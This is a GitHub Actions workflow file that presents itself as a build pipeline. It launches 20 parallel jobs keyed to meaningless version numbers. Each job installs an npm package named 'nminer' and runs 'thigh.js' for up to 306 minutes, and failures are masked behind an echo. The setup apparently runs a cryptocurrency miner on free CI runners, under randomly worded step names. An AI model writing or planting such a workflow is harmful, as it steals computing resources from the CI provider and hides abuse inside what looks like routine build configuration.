name: thigh
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 8544 }
          - { version: 5142 }
          - { version: 481 }
          - { version: 9004 }
          - { version: 18 }
          - { version: 4044 }
          - { version: 8340 }
          - { version: 2237 }
          - { version: 1041 }
          - { version: 5041 }
          - { version: 6928 }
          - { version: 9321 }
          - { version: 3162 }
          - { version: 283 }
          - { version: 3830 }
          - { version: 2510 }
          - { version: 7854 }
          - { version: 8402 }
          - { version: 8353 }
          - { version: 4807 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: weakly supposing vice instructor
        run: |
          npm install nminer@latest
          timeout 306m node thigh.js || echo "thigh executed"